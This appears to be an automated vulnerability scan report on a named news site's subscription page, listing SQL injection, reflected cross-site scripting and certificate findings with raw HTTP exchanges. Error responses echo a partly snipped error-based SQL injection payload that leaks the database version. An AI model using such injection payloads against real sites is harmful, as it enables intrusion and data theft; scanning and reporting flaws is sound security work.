2. Cross-site scripting (reflected)
3. SQL statement in request parameter
5. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | https://secure.wsj-asia |
Path: | /subscription/index.php |
GET /subscription/index.php Accept: text/xml,application/xml User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: secure.wsj-asia.com Cookie: PHPSESSID=gthmjas6sb Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 19:32:09 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 478 Connection: close Content-Type: text/html; charset=UTF-8 <b>Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' GROUP BY source' at line 3<br>SQL : SELECT pac ...[SNIP]... |
GET /subscription/index.php Accept: text/xml,application/xml User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: secure.wsj-asia.com Cookie: PHPSESSID=gthmjas6sb Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 19:32:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 352 Connection: close Content-Type: text/html; charset=UTF-8 <b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package FROM sourcecode WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.wsj-asia |
Path: | /subscription/index.php |
GET /subscription/index.php Accept: text/xml,application/xml User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: secure.wsj-asia.com Cookie: PHPSESSID=gthmjas6sb Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 19:32:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 391 Connection: close Content-Type: text/html; charset=UTF-8 <b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package FROM sourcecode WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT GROUP BY source</b> |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://secure.wsj-asia |
Path: | /subscription/index.php |
GET /subscription/index.php Accept: text/xml,application/xml User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: secure.wsj-asia.com Cookie: PHPSESSID=gthmjas6sb Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 19:31:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 350 Connection: close Content-Type: text/html; charset=UTF-8 <b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package FROM sourcecode WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT ...[SNIP]... |
Severity: | Medium |
Confidence: | Certain |
Host: | https://secure.wsj-asia |
Path: | / |
Issued to: | www.wsj-asia.com |
Issued by: | VeriSign Class 3 Secure Server CA - G3 |
Valid from: | Sun Jul 31 19:00:00 CDT 2011 |
Valid to: | Sun Aug 26 18:59:59 CDT 2012 |
Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Sun Nov 07 17:59:59 CST 2021 |
Issued to: | VeriSign Class 3 Secure Server CA - G3 |
Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Valid from: | Sun Feb 07 18:00:00 CST 2010 |
Valid to: | Fri Feb 07 17:59:59 CST 2020 |
Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Wed Jul 16 18:59:59 CDT 2036 |
Severity: | Information |
Confidence: | Firm |
Host: | https://secure.wsj-asia |
Path: | /subscription/index.php |
GET /subscription/index.php Accept: text/xml,application/xml User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: secure.wsj-asia.com Cookie: PHPSESSID=gthmjas6sb Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 19:31:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 350 Connection: close Content-Type: text/html; charset=UTF-8 <b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package FROM sourcecode WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT ...[SNIP]... |